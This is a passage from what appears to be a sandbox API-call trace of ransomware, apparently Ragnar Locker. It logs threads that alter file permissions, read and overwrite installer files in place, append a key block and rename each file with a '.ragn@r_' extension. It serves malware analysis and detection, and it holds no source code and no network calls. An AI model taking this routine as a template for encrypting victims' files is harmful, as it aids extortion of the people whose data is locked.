| out: lpFileSize=0x5affb14*=3865) returned 1 [0176.421] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0xf0a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.421] GetProcessHeap () returned 0x3520000 [0176.421] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584b08 [0176.421] ReadFile (in: hFile=0x3bc, lpBuffer=0x3584b08, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5affacc, lpOverlapped=0x0 | out: lpBuffer=0x3584b08*, lpNumberOfBytesRead=0x5affacc*=0xf, lpOverlapped=0x0) returned 1 [0176.423] VirtualAlloc (lpAddress=0x0, dwSize=0xf19, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0176.424] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.424] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5affae8 | out: lpNewFilePointer=0x0) returned 1 [0176.424] ReadFile (in: hFile=0x3bc, lpBuffer=0x2f70000, nNumberOfBytesToRead=0xf19, lpNumberOfBytesRead=0x5affabc, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5affabc*=0xf19, lpOverlapped=0x0) returned 1 [0176.424] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5affac0 | out: lpNewFilePointer=0x0) returned 1 [0176.424] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xf19, nNumberOfBytesToLockHigh=0x0) returned 1 [0176.424] WriteFile (in: hFile=0x3bc, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0xf19, lpNumberOfBytesWritten=0x5affab8, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5affab8*=0xf19, lpOverlapped=0x0) returned 1 [0176.424] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xf19, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0176.424] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.425] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0xf19, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.425] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0176.425] WriteFile (in: hFile=0x3bc, lpBuffer=0x5d1cfbc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affaf8, lpOverlapped=0x0 | out: lpBuffer=0x5d1cfbc*, lpNumberOfBytesWritten=0x5affaf8*=0x100, lpOverlapped=0x0) returned 1 [0176.425] WriteFile (in: hFile=0x3bc, lpBuffer=0x5d1d0bc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affaf8, lpOverlapped=0x0 | out: lpBuffer=0x5d1d0bc*, lpNumberOfBytesWritten=0x5affaf8*=0x100, lpOverlapped=0x0) returned 1 [0176.425] WriteFile (in: hFile=0x3bc, lpBuffer=0x5affafc*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5affaf8, lpOverlapped=0x0 | out: lpBuffer=0x5affafc*, lpNumberOfBytesWritten=0x5affaf8*=0xf, lpOverlapped=0x0) returned 1 [0176.425] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0176.425] GetProcessHeap () returned 0x3520000 [0176.425] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584b08 | out: hHeap=0x3520000) returned 1 [0176.426] CloseHandle (hObject=0x3bc) returned 1 [0176.428] lstrcpyW (in: lpString1=0x5aff668, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf" [0176.428] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf.ragn@r_B8CF767A" [0176.428] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 228 os_tid = 0x1278 [0176.450] GetNamedSecurityInfoW () returned 0x0 [0176.450] SetEntriesInAclW () returned 0x0 [0176.450] SetNamedSecurityInfoW () returned 0x0 [0176.451] LocalFree (hMem=0x358ee28) returned 0x0 [0176.451] LocalFree (hMem=0x358ee3c) returned 0x358ee3c [0176.451] LocalFree (hMem=0x5d4ff20) returned 0x0 [0176.451] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml")) returned 0x20 [0176.451] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3bc [0176.451] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x5effad4 | out: lpFileSize=0x5effad4*=77680) returned 1 [0176.451] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x12f61, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.451] GetProcessHeap () returned 0x3520000 [0176.451] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584b08 [0176.452] ReadFile (in: hFile=0x3bc, lpBuffer=0x3584b08, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5effa8c, lpOverlapped=0x0 | out: lpBuffer=0x3584b08*, lpNumberOfBytesRead=0x5effa8c*=0xf, lpOverlapped=0x0) returned 1 [0176.453] VirtualAlloc (lpAddress=0x0, dwSize=0x12f70, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0176.454] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.454] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5effaa8 | out: lpNewFilePointer=0x0) returned 1 [0176.454] ReadFile (in: hFile=0x3bc, lpBuffer=0x2f70000, nNumberOfBytesToRead=0x12f70, lpNumberOfBytesRead=0x5effa7c, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5effa7c*=0x12f70, lpOverlapped=0x0) returned 1 [0176.456] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5effa80 | out: lpNewFilePointer=0x0) returned 1 [0176.457] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x12f70, nNumberOfBytesToLockHigh=0x0) returned 1 [0176.457] WriteFile (in: hFile=0x3bc, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0x12f70, lpNumberOfBytesWritten=0x5effa78, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5effa78*=0x12f70, lpOverlapped=0x0) returned 1 [0176.457] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x12f70, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0176.457] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.458] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x12f70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.458] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0176.458] WriteFile (in: hFile=0x3bc, lpBuffer=0x361339c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5effab8, lpOverlapped=0x0 | out: lpBuffer=0x361339c*, lpNumberOfBytesWritten=0x5effab8*=0x100, lpOverlapped=0x0) returned 1 [0176.458] WriteFile (in: hFile=0x3bc, lpBuffer=0x361349c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5effab8, lpOverlapped=0x0 | out: lpBuffer=0x361349c*, lpNumberOfBytesWritten=0x5effab8*=0x100, lpOverlapped=0x0) returned 1 [0176.458] WriteFile (in: hFile=0x3bc, lpBuffer=0x5effabc*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5effab8, lpOverlapped=0x0 | out: lpBuffer=0x5effabc*, lpNumberOfBytesWritten=0x5effab8*=0xf, lpOverlapped=0x0) returned 1 [0176.459] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0176.459] GetProcessHeap () returned 0x3520000 [0176.459] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584b08 | out: hHeap=0x3520000) returned 1 [0176.459] CloseHandle (hObject=0x3bc) returned 1 [0176.468] lstrcpyW (in: lpString1=0x5eff628, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" [0176.468] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml.ragn@r_B8CF767A" [0176.468] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 229 os_tid = 0xfb0 [0176.761] GetNamedSecurityInfoW () returned 0x0 [0176.761] SetEntriesInAclW () returned 0x0 [0176.761] SetNamedSecurityInfoW () returned 0x0 [0176.762] LocalFree (hMem=0x358ee28) returned 0x0 [0176.762] LocalFree (hMem=0x358ee3c) returned 0x358ee3c [0176.762] LocalFree (hMem=0x5d4ff20) returned 0x0 [0176.762] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf")) returned 0x20 [0176.762] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3b8 [0176.762] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x5affacc | out: lpFileSize=0x5affacc*=3859) returned 1 [0176.762] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0xf04, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.762] GetProcessHeap () returned 0x3520000 [0176.763] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3585288 [0176.763] ReadFile (in: hFile=0x3b8, lpBuffer=0x3585288, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5affa84, lpOverlapped=0x0 | out: lpBuffer=0x3585288*, lpNumberOfBytesRead=0x5affa84*=0xf, lpOverlapped=0x0) returned 1 [0176.765] VirtualAlloc (lpAddress=0x0, dwSize=0xf13, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0176.765] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.765] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5affaa0 | out: lpNewFilePointer=0x0) returned 1 [0176.765] ReadFile (in: hFile=0x3b8, lpBuffer=0x2f70000, nNumberOfBytesToRead=0xf13, lpNumberOfBytesRead=0x5affa74, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5affa74*=0xf13, lpOverlapped=0x0) returned 1 [0176.765] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5affa78 | out: lpNewFilePointer=0x0) returned 1 [0176.766] LockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xf13, nNumberOfBytesToLockHigh=0x0) returned 1 [0176.766] WriteFile (in: hFile=0x3b8, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0xf13, lpNumberOfBytesWritten=0x5affa70, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5affa70*=0xf13, lpOverlapped=0x0) returned 1 [0176.766] UnlockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xf13, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0176.766] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.766] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0xf13, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.766] LockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0176.766] WriteFile (in: hFile=0x3b8, lpBuffer=0x361339c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affab0, lpOverlapped=0x0 | out: lpBuffer=0x361339c*, lpNumberOfBytesWritten=0x5affab0*=0x100, lpOverlapped=0x0) returned 1 [0176.767] WriteFile (in: hFile=0x3b8, lpBuffer=0x361349c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affab0, lpOverlapped=0x0 | out: lpBuffer=0x361349c*, lpNumberOfBytesWritten=0x5affab0*=0x100, lpOverlapped=0x0) returned 1 [0176.767] WriteFile (in: hFile=0x3b8, lpBuffer=0x5affab4*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5affab0, lpOverlapped=0x0 | out: lpBuffer=0x5affab4*, lpNumberOfBytesWritten=0x5affab0*=0xf, lpOverlapped=0x0) returned 1 [0176.767] UnlockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0176.767] GetProcessHeap () returned 0x3520000 [0176.767] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3585288 | out: hHeap=0x3520000) returned 1 [0176.767] CloseHandle (hObject=0x3b8) returned 1 [0176.768] lstrcpyW (in: lpString1=0x5aff620, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf" [0176.768] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf.ragn@r_B8CF767A" [0176.768] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 230 os_tid = 0x123c [0176.774] GetNamedSecurityInfoW () returned 0x0 [0176.774] SetEntriesInAclW () returned 0x0 [0176.774] SetNamedSecurityInfoW () returned 0x0 [0176.775] LocalFree (hMem=0x358ee28) returned 0x0 [0176.775] LocalFree (hMem=0x358ee3c) returned 0x358ee3c [0176.775] LocalFree (hMem=0x5d4ff20) returned 0x0 [0176.775] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml")) returned 0x20 [0176.775] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3b8 [0176.775] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x5effc14 | out: lpFileSize=0x5effc14*=76818) returned 1 [0176.775] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x12c03, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.775] GetProcessHeap () returned 0x3520000 [0176.775] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3585288 [0176.775] ReadFile (in: hFile=0x3b8, lpBuffer=0x3585288, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5effbcc, lpOverlapped=0x0 | out: lpBuffer=0x3585288*, lpNumberOfBytesRead=0x5effbcc*=0xf, lpOverlapped=0x0) returned 1 [0176.777] VirtualAlloc (lpAddress=0x0, dwSize=0x12c12, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0176.778] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.778] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5effbe8 | out: lpNewFilePointer=0x0) returned 1 [0176.778] ReadFile (in: hFile=0x3b8, lpBuffer=0x2f70000, nNumberOfBytesToRead=0x12c12, lpNumberOfBytesRead=0x5effbbc, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5effbbc*=0x12c12, lpOverlapped=0x0) returned 1 [0176.781] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5effbc0 | out: lpNewFilePointer=0x0) returned 1 [0176.781] LockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x12c12, nNumberOfBytesToLockHigh=0x0) returned 1 [0176.782] WriteFile (in: hFile=0x3b8, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0x12c12, lpNumberOfBytesWritten=0x5effbb8, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5effbb8*=0x12c12, lpOverlapped=0x0) returned 1 [0176.782] UnlockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x12c12, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0176.782] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.783] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x12c12, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.783] LockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0176.783] WriteFile (in: hFile=0x3b8, lpBuffer=0x5d1cfbc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5effbf8, lpOverlapped=0x0 | out: lpBuffer=0x5d1cfbc*, lpNumberOfBytesWritten=0x5effbf8*=0x100, lpOverlapped=0x0) returned 1 [0176.783] WriteFile (in: hFile=0x3b8, lpBuffer=0x5d1d0bc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5effbf8, lpOverlapped=0x0 | out: lpBuffer=0x5d1d0bc*, lpNumberOfBytesWritten=0x5effbf8*=0x100, lpOverlapped=0x0) returned 1 [0176.783] WriteFile (in: hFile=0x3b8, lpBuffer=0x5effbfc*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5effbf8, lpOverlapped=0x0 | out: lpBuffer=0x5effbfc*, lpNumberOfBytesWritten=0x5effbf8*=0xf, lpOverlapped=0x0) returned 1 [0176.783] UnlockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0176.783] GetProcessHeap () returned 0x3520000 [0176.784] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3585288 | out: hHeap=0x3520000) returned 1 [0176.784] CloseHandle (hObject=0x3b8) returned 1 [0176.786] lstrcpyW (in: lpString1=0x5eff768, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" [0176.786] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml.ragn@r_B8CF767A" [0176.786] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 231 os_tid = 0x137c [0177.153] GetNamedSecurityInfoW () returned 0x0 [0177.314] SetEntriesInAclW () returned 0x0 [0177.314] SetNamedSecurityInfoW () returned 0x0 [0177.315] LocalFree (hMem=0x358ee28) returned 0x0 [0177.315] LocalFree (hMem=0x358ee3c) returned 0x358ee3c [0177.315] LocalFree (hMem=0x5d4ff20) returned 0x0 [0177.315] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf")) returned 0x20 [0177.315] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x370 [0177.315] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x5aff90c | out: lpFileSize=0x5aff90c*=5827) returned 1 [0177.315] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x16b4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.315] GetProcessHeap () returned 0x3520000 [0177.315] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x35819b8 [0177.316] ReadFile (in: hFile=0x370, lpBuffer=0x35819b8, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5aff8c4, lpOverlapped=0x0 | out: lpBuffer=0x35819b8*, lpNumberOfBytesRead=0x5aff8c4*=0xf, lpOverlapped=0x0) returned 1 [0177.317] VirtualAlloc (lpAddress=0x0, dwSize=0x16c3, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0177.318] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.318] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5aff8e0 | out: lpNewFilePointer=0x0) returned 1 [0177.318] ReadFile (in: hFile=0x370, lpBuffer=0x2f70000, nNumberOfBytesToRead=0x16c3, lpNumberOfBytesRead=0x5aff8b4, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5aff8b4*=0x16c3, lpOverlapped=0x0) returned 1 [0177.319] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5aff8b8 | out: lpNewFilePointer=0x0) returned 1 [0177.319] LockFile (hFile=0x370, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x16c3, nNumberOfBytesToLockHigh=0x0) returned 1 [0177.319] WriteFile (in: hFile=0x370, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0x16c3, lpNumberOfBytesWritten=0x5aff8b0, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5aff8b0*=0x16c3, lpOverlapped=0x0) returned 1 [0177.319] UnlockFile (hFile=0x370, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x16c3, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0177.319] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0177.320] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x16c3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.320] LockFile (hFile=0x370, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0177.320] WriteFile (in: hFile=0x370, lpBuffer=0x5d1cfbc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5aff8f0, lpOverlapped=0x0 | out: lpBuffer=0x5d1cfbc*, lpNumberOfBytesWritten=0x5aff8f0*=0x100, lpOverlapped=0x0) returned 1 [0177.320] WriteFile (in: hFile=0x370, lpBuffer=0x5d1d0bc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5aff8f0, lpOverlapped=0x0 | out: lpBuffer=0x5d1d0bc*, lpNumberOfBytesWritten=0x5aff8f0*=0x100, lpOverlapped=0x0) returned 1 [0177.320] WriteFile (in: hFile=0x370, lpBuffer=0x5aff8f4*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5aff8f0, lpOverlapped=0x0 | out: lpBuffer=0x5aff8f4*, lpNumberOfBytesWritten=0x5aff8f0*=0xf, lpOverlapped=0x0) returned 1 [0177.320] UnlockFile (hFile=0x370, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0177.320] GetProcessHeap () returned 0x3520000 [0177.320] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x35819b8 | out: hHeap=0x3520000) returned 1 [0177.321] CloseHandle (hObject=0x370) returned 1 [0177.324] lstrcpyW (in: lpString1=0x5aff460, lpString2="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf" [0177.324] 